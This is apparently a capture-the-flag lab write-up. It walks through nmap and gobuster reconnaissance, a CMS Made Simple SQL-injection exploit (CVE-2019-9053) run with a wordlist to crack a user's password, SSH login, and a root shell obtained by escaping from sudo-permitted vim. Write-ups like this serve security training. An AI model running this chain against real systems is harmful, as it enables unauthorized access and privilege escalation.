Simple CTF
IP: 10.10.25.29

- USE NMAP (sudo nmap -sV -A 10.10.25.29)
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 3.0.3
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:10.8.65.58
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
| http-robots.txt: 2 disallowed entries
|_/ /openemr-5_0_1_3
|_http-server-header: Apache/2.4.18 (Ubuntu)
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 29:42:69:14:9e:ca:d9:17:98:8c:27:72:3a:cd:a9:23 (RSA)
|   256 9b:d1:65:07:51:08:00:61:98:de:95:ed:3a:e3:81:1c (ECDSA)
|_  256 12:65:1b:61:cf:4d:e5:75:fe:f4:e8:d4:6e:10:2a:f6 (ED25519)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|specialized
Running (JUST GUESSING): Linux 4.X|2.6.X|3.X|5.X (95%), Crestron 2-Series (86%)
OS CPE: cpe:/o:linux:linux_kernel:4.15 cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:5 cpe:/o:crestron:2_series
Aggressive OS guesses: Linux 4.15 (95%), Linux 2.6.32 - 3.13 (91%), Linux 3.10 - 4.11 (91%), Linux 3.2 - 4.14 (91%), Linux 4.15 - 5.19 (91%), Linux 5.0 - 5.14 (91%), Linux 2.6.32 - 3.10 (91%), Linux 4.4 (90%), Linux 3.10 - 3.13 (90%), Linux 2.6.32 - 3.5 (86%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 80/tcp)
HOP RTT      ADDRESS
1   64.29 ms 10.8.0.1
2   64.33 ms 10.10.25.29


- USE GOBUSTER (gobuster dir -w /usr/share/seclists/Discovery/Web-Content/common.txt -u 10.10.26.84)
/robots.txt
/index.html
/simple


- USE SEARCHSPLOIT TO CHECK VULNERABILITIES (10.10.25.29)
...
CMS Made Simple < 2.2.10 - SQL Injection                | php/webapps/46635.py
...
Our website is vulnerable to SQL Injections (CVE-2019-9053)


- USE SQLI SCRIPT WITH WORDLIST (python3 Downloads/updated_46635.py -u http://10.10.25.29/simple/ -w /usr/share/wordlists/rockyou.txt --crack /usr/share/wordlists/rockyou.txt)
salt for password: 1dac0d92e9fa6bb2
username: mitch
email: admin@admin.com
password: 0c01f4468bd75d7a84c7eb73846e8d96
cracked password: secret


- CONNECT VIA SSH TO MITCH (ssh mitch@10.10.25.29 -p 2222)
$ cat user.txt
G00d j0b, keep up!


- FIND A WAY TO GAIN ROOT SHELL (sudo -l)
Output: ... /usr/bin/vim


- OPEN ROOT SHELL WITH VIM (:!bash)
$ cat /root/root.txt
W3ll d0n3. You made it!
